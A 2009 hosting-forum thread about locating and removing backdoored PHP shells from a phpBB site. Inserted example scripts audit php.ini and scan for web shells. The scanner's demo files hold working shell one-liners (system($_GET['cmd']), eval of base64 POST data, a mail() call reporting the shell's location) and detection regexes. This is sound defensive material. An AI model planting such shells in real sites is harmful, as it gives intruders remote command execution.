

Best way to remove shell scripts?




Posted by 1aleem, 09-08-2009, 01:22 PM
I hired a coder to work on the phpBB forum I had with an old host, installing modifications with it. The forum kept going down, so I asked my web host's staff what the problem was. I had my account terminated; they claimed I had installed two shell scripts and that I wasn't to be trusted. I absolutely know nothing about these scripts, and I need to get rid of them, but I'm scared my new host will do the same thing if I ask for help. Is there a quick and efficient way to locate and remove these files from my VPS server?

Posted by DesignBear, 09-08-2009, 01:36 PM
Ask your old host which scripts they were and where they were located.

Posted by 1aleem, 09-08-2009, 01:54 PM
They said: "A certain shell on your hosting account is backdoored to email the location of the shell to the maker of the PHP shell. $shell_email="mulciber-@hotmail.com"; ..." I tried to find out what the other one was. They refused to talk to me.

Posted by eth10, 09-08-2009, 02:44 PM
grep -r '$shell_email="mulciber-@hotmail.com"' .   # single quotes: the shell must not expand $shell_email
You will get the file name where this is located. Just remove this line from that file.

Posted by nomankhn, 09-08-2009, 02:54 PM
Hello, please try this:
find /var/www -type f -exec grep -l "mulciber-@hotmail.com" {} \;
/var/www is the directory where you want to search for those files; it's up to you which directory you define. That will give you a list of the files that contain that email address.

Posted by CodyRo, 09-08-2009, 07:35 PM
That's.. sort of a backwards way to do it.. As said above, use the -R switch for a recursive search. Should do the trick (the -R is recursive and the -i means case insensitive).

Posted by avelinux, 09-09-2009, 02:11 AM
Removing the files is only a temporary fix. If the phpBB software is outdated, it is strongly recommended that you get the software updated or start from scratch. There can potentially be many files or scripts in the web directory of the site or the /tmp directory of the VPS which have backdoor code installed.
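The grep and find one-liners above look for the one string the old host quoted; the post above points out that there may be more files, including ones in /tmp. The script below is an added example (not code from any poster on this thread) that puts both ideas together: it scans every file under a web root and a tmp directory, not just *.php, for a small list of web-shell indicators. The indicator regexes are this example's own choice, and the directory tree built by make_sample_webroot is constructed for the demo.

```shell
#!/bin/sh
# Added example, not code from the thread: scan a web root and a tmp
# directory for files carrying common PHP web-shell indicators.
# The tree written by make_sample_webroot is constructed for this demo.

# One extended regex per line. The first two are the exact strings the
# old host quoted; the rest are patterns obfuscated shells commonly carry
# (indicator choice is this example's assumption, not a complete list).
SHELL_INDICATORS='mulciber-@hotmail\.com
\$shell_email[[:space:]]*=
eval[[:space:]]*\([[:space:]]*(base64_decode|gzinflate|gzuncompress|str_rot13)[[:space:]]*\(
(system|passthru|shell_exec|exec|popen|proc_open)[[:space:]]*\([[:space:]]*\$_(GET|POST|REQUEST|COOKIE)\['

# scan_for_shells DIR...: print each file (once) matching any indicator.
# Every file is inspected, not only *.php, because uploaded shells are
# often named like images or session files.
scan_for_shells() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        printf '%s\n' "$SHELL_INDICATORS" | while IFS= read -r pat; do
            [ -n "$pat" ] || continue
            # -r recurse, -l names only, -i case-insensitive,
            # -I skip binaries, -E extended regex
            grep -rliIE -e "$pat" "$dir" 2>/dev/null
        done
    done | sort -u
}

# make_sample_webroot DIR: constructed sample tree with one clean include,
# a shell carrying the quoted backdoor e-mail, an eval() shell hidden in
# the images directory, and a one-liner dropped into tmp.
make_sample_webroot() {
    mkdir -p "$1/public_html/forum/includes" "$1/public_html/forum/images" "$1/tmp"
    cat > "$1/public_html/forum/includes/functions.php" <<'EOF'
<?php
// clean file: nothing here runs exec-style functions on request data
function get_user($id) { return (int) $id; }
EOF
    cat > "$1/public_html/forum/images/c99.php" <<'EOF'
<?php
$shell_email="mulciber-@hotmail.com";
@mail($shell_email, "new shell", $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
EOF
    cat > "$1/public_html/forum/images/logo.jpg.php" <<'EOF'
<?php eval(base64_decode($_POST['x'])); ?>
EOF
    cat > "$1/tmp/sess_4f2a" <<'EOF'
<?php system($_GET['cmd']); ?>
EOF
}

# Stand-alone demo: build the constructed tree, scan it, clean up.
demo_root=$(mktemp -d)
make_sample_webroot "$demo_root"
scan_for_shells "$demo_root/public_html" "$demo_root/tmp"
rm -rf "$demo_root"
```

On a real VPS you would run something like scan_for_shells /home/*/public_html /tmp /var/tmp. A hit is an indicator, not proof: legitimate code also calls exec-style functions, so diff each flagged file against a clean copy of the same phpBB release before deleting it, and treat anything executable sitting in /tmp as suspect regardless of content.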

Posted by zacharooni, 09-09-2009, 02:18 AM
You should probably set some disable_functions in your php.ini like so:
disable_functions = apache_get_modules,apache_get_version,apache_getenv,apache_note,apache_setenv,disk_free_space,diskfreespace,dl,highlight_file,ini_alter,ini_restore,openlog,passthru,phpinfo,proc_nice,shell_exec,show_source,symlink,system
EDIT: I forgot to add that this will output errors in error_log provided you have log_errors=On in php.ini; you can then see what file is executing the functions in the disable_functions list.
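Two things a practitioner wants to check after following the advice above: that the php.ini actually in effect carries the full disable_functions list (a commented-out or earlier line is easy to mistake for a live one), and which files tripped a disabled function once log_errors is on. The script below is an added example, not code from the poster. It parses a php.ini fragment and an error_log; the warning format it matches ("foo() has been disabled for security reasons in FILE on line N") is PHP's standard message as this example assumes it, and the ini and log contents written by the write_sample_* helpers are constructed for the demo.

```shell
#!/bin/sh
# Added example, not code from the thread: audit a php.ini against the
# disable_functions list recommended above, and extract from PHP's
# error_log the files that called a disabled function. The ini and log
# written by write_sample_ini / write_sample_log are constructed.

RECOMMENDED_DISABLED='apache_get_modules apache_get_version apache_getenv
apache_note apache_setenv disk_free_space diskfreespace dl highlight_file
ini_alter ini_restore openlog passthru phpinfo proc_nice shell_exec
show_source symlink system'

# disabled_functions_in INI: the effective disable_functions list, one
# name per line. Commented lines (leading ;) are ignored, trailing
# comments and whitespace stripped, and the last live assignment wins.
disabled_functions_in() {
    grep -E '^[[:space:]]*disable_functions[[:space:]]*=' "$1" \
        | tail -n 1 \
        | sed -e 's/^[^=]*=//' -e 's/;.*$//' -e 's/[[:space:]"]//g' \
        | tr ',' '\n' \
        | grep -v '^$' || true
}

# missing_disabled_functions INI: print the recommended names that INI
# does not disable (space separated). Exit 0 if none, 1 otherwise.
missing_disabled_functions() {
    have=$(disabled_functions_in "$1")
    missing=''
    for fn in $RECOMMENDED_DISABLED; do
        printf '%s\n' "$have" | grep -qx "$fn" || missing="$missing $fn"
    done
    [ -n "$missing" ] || return 0
    printf '%s\n' "${missing# }"
    return 1
}

# offending_files_from_log LOG: "FILE function" pairs, one per line, taken
# from PHP's "foo() has been disabled for security reasons in FILE on
# line N" warnings (format assumed from PHP's standard message).
offending_files_from_log() {
    sed -n -E 's/.*[[:space:]]([A-Za-z0-9_]+)\(\) has been disabled for security reasons in (.+) on line [0-9]+.*/\2 \1/p' "$1" \
        | sort -u
}

# write_sample_ini FILE: constructed php.ini with a weak live setting and
# a commented-out line that a naive grep would wrongly count.
write_sample_ini() {
    cat > "$1" <<'EOF'
; constructed php.ini fragment
;disable_functions = system,passthru,shell_exec,exec
disable_functions = phpinfo, dl , symlink   ; still far too short
log_errors = On
EOF
}

# write_sample_log FILE: constructed error_log; paths are made up.
write_sample_log() {
    cat > "$1" <<'EOF'
[08-Sep-2009 13:10:02] PHP Warning:  system() has been disabled for security reasons in /home/user/public_html/forum/images/c99.php on line 12
[08-Sep-2009 13:10:05] PHP Notice:  Undefined index: sid in /home/user/public_html/forum/index.php on line 40
[08-Sep-2009 13:11:44] PHP Warning:  shell_exec() has been disabled for security reasons in /home/user/public_html/forum/images/c99.php on line 30
EOF
}

# Stand-alone demo on the constructed files.
ini=$(mktemp); log=$(mktemp)
write_sample_ini "$ini"; write_sample_log "$log"
echo "still callable:"; missing_disabled_functions "$ini" || true
echo "files that hit a disabled function:"; offending_files_from_log "$log"
rm -f "$ini" "$log"
```

Parsing the file tells you what is written, not necessarily what is loaded; on a live box confirm with php -i | grep disable_functions, since a per-vhost or .user.ini override can differ from the global php.ini. The "FILE function" pairs from error_log are the quickest pointer to the shell's location, which is exactly the file list the earlier grep/find answers were trying to produce.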


